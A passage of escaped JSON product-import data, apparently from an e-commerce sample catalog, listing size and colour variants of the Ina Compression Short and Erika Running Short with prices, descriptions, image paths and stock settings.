"additional_images\":\"\\/w\\/s\\/wsh11-blue_back.jpg\",\"image\":\"\\/w\\/s\\/wsh11-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/wsh11-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/s\\/wsh11-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"29\",\"color\":\"Blue\"},\"1975\":{\"sku\":\"WSH11-29-Orange\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Shorts,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Ina Compression Short-29-Orange\",\"description\":\"<p>One of Luma\'s most popular items, the Ina Compression Short has you covered with exceptional support and comfort, whether you\'re running the trail, riding a bike or ripping out reps. The ventilating fabric offers cool relief and prevents irritating chafing.<\\/p>\\n<p>&bull; Royal blue bike shorts.<br \\/>&bull; Compression fit. <br \\/>&bull; Moisture-wicking. <br \\/>&bull; Anti-microbial. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"49\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"ina-compression-short-29-orange\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/wsh11-orange_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/wsh11-orange_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/wsh11-orange_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=29,color=Orange\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/wsh11-orange_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/wsh11-orange_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"29\",\"color\":\"Orange\"},\"1976\":{\"sku\":\"WSH11-29-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Shorts,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Ina Compression Short-29-Red\",\"description\":\"<p>One of Luma\'s most popular items, the Ina Compression Short has you covered with exceptional support and comfort, whether you\'re running the trail, riding a bike or ripping out reps. The ventilating fabric offers cool relief and prevents irritating chafing.<\\/p>\\n<p>&bull; Royal blue bike shorts.<br \\/>&bull; Compression fit. <br \\/>&bull; Moisture-wicking. <br \\/>&bull; Anti-microbial. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"49\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"ina-compression-short-29-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/wsh11-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/wsh11-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/wsh11-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=29,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/wsh11-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/wsh11-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"29\",\"color\":\"Red\"},\"1977\":{\"sku\":\"WSH11\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"configurable\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Shorts,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Ina Compression Short\",\"description\":\"<p>One of Luma\'s most popular items, the Ina Compression Short has you covered with exceptional support and comfort, whether you\'re running the trail, riding a bike or ripping out reps. The ventilating fabric offers cool relief and prevents irritating chafing.<\\/p>\\n<p>&bull; Royal blue bike shorts.<br \\/>&bull; Compression fit. <br \\/>&bull; Moisture-wicking. <br \\/>&bull; Anti-microbial. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":null,\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Catalog, Search\",\"price\":\"49\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":null,\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/wsh11-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/wsh11-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/wsh11-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=1,required_options=1,style_bottom=Snug|Base Layer|Compression,material=LumaTech&trade;|Spandex,pattern=Solid,climate=All-weather|Hot|Warm,eco_collection=No,performance_fabric=Yes,erin_recommends=Yes,new=No,sale=No\",\"qty\":\"0\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":\"sku=WSH11-28-Blue,size=28,color=Blue|sku=WSH11-28-Orange,size=28,color=Orange|sku=WSH11-28-Red,size=28,color=Red|sku=WSH11-29-Blue,size=29,color=Blue|sku=WSH11-29-Orange,size=29,color=Orange|sku=WSH11-29-Red,size=29,color=Red\",\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/s\\/wsh11-blue_back.jpg\",\"image\":\"\\/w\\/s\\/wsh11-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/wsh11-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/s\\/wsh11-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"1\",\"required_options\":\"1\",\"style_bottom\":\"Snug|Base Layer|Compression\",\"material\":\"LumaTech&trade;|Spandex\",\"pattern\":\"Solid\",\"climate\":\"All-weather|Hot|Warm\",\"eco_collection\":\"No\",\"performance_fabric\":\"Yes\",\"erin_recommends\":\"Yes\",\"new\":\"No\",\"sale\":\"No\"},\"1978\":{\"sku\":\"WSH12-28-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Shorts,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Erika Running Short-28-Green\",\"description\":\"<p>A great short with a body-hugging design, the Erika Running Short is perfect for runners who prefer a fitted short rather than the traditional baggy variety.<\\/p>\\n<p>&bull; Seafoam pattern running shorts.<br \\/>&bull; Elastic waistband.<br \\/>&bull; Snug fit.<br \\/>&bull; 4\'\' inseam.<br \\/>&bull; 76% premium brushed Nylon \\/ 24% Spandex.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"45\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"erika-running-short-28-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/wsh12-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/wsh12-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/wsh12-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=28,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/s\\/wsh12-green_alt1.jpg,\\/w\\/s\\/wsh12-green_back.jpg\",\"image\":\"\\/w\\/s\\/wsh12-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/wsh12-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/s\\/wsh12-green_alt1.jpg,\\/w\\/s\\/wsh12-green_back.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"28\",\"color\":\"Green\"},\"1979\":{\"sku\":\"WSH12-28-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Shorts,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Erika Running Short-28-Purple\",\"description\":\"<p>A great short with a body-hugging design, the Erika Running Short is perfect for runners who prefer a fitted short rather than the traditional baggy variety.<\\/p>\\n<p>&bull; Seafoam pattern running shorts.<br \\/>&bull; Elastic waistband.<br \\/>&bull; Snug fit.<br \\/>&bull; 4\'\' inseam.<br \\/>&bull; 76% premium brushed Nylon \\/ 24% Spandex.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"45\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"erika-running-short-28-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/wsh12-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/wsh12-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/wsh12-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=28,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/wsh12-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/wsh12-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"28\",\"color\":\"Purple\"},\"1980\":{\"sku\":\"WSH12-28-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Shorts,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Erika Running Short-28-Red\",\"description\":\"<p>A great short with a body-hugging design, the Erika Running Short is perfect for runners who prefer a fitted short rather than the traditional baggy variety.<\\/p>\\n<p>&bull; Seafoam pattern running shorts.<br \\/>&bull; Elastic waistband.<br \\/>&bull; Snug fit.<br \\/>&bull; 4\'\' inseam.<br \\/>&bull; 76% premium brushed Nylon \\/ 24% Spandex.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"45\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"erika-running-short-28-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/wsh12-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/wsh12-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/wsh12-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=28,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/wsh12-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/wsh12-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"28\",\"color\":\"Red\"},\"1981\":{\"sku\":\"WSH12-29-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Shorts,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Erika Running Short-29-Green\",\"description\":\"<p>A great short with a body-hugging design, the Erika Running Short is perfect for runners who prefer a fitted short rather than the traditional baggy variety.<\\/p>\\n<p>&bull; Seafoam pattern running shorts.<br \\/>&bull; Elastic waistband.<br \\/>&bull; Snug fit.<br \\/>&bull; 4\'\' inseam.<br \\/>&bull; 76% premium brushed Nylon \\/ 24% Spandex.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"45\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"erika-running-short-29-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/wsh12-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/wsh12-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/wsh12-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=29,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/s\\/wsh12-green_alt1.jpg,\\/w\\/s\\/wsh12-green_back.jpg\",\"image\":\"\\/w\\/s\\/wsh12-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/wsh12-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/s\\/wsh12-green_alt1.jpg,\\/w\\/s\\/wsh12-green_back.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"29\",\"color\":\"Green\"},\"1982\":{\"sku\":\"WSH12-29-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Shorts,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Erika Running Short-29-Purple\",\"description\":\"<p>A great short with a body-hugging design, the Erika Running Short is perfect for runners who prefer a fitted short rather than the traditional baggy variety.<\\/p>\\n<p>&bull; Seafoam pattern running shorts.<br \\/>&bull; Elastic waistband.<br \\/>&bull; Snug fit.<br \\/>&bull; 4\'\' inseam.<br \\/>&bull; 76% premium brushed Nylon \\/ 24% Spandex.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"45\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"erika-running-short-29-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/wsh12-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/wsh12-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/wsh12-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=29,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/wsh12-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/wsh12-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"29\",\"color\":\"Purple\"},\"1983\":{\"sku\":\"WSH12-29-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Shorts,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Erika Running Short-29-Red\",\"description\":\"<p>A great short with a body-hugging design, the Erika Running Short is perfect for runners who prefer a fitted short rather than the traditional baggy variety.<\\/p>\\n<p>&bull; Seafoam pattern running shorts.<br \\/>&bull; Elastic waistband.<br \\/>&bull; Snug fit.<br \\/>&bull; 4\'\' inseam.<br \\/>&bull; 76% premium brushed Nylon \\/ 24% Spandex.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible 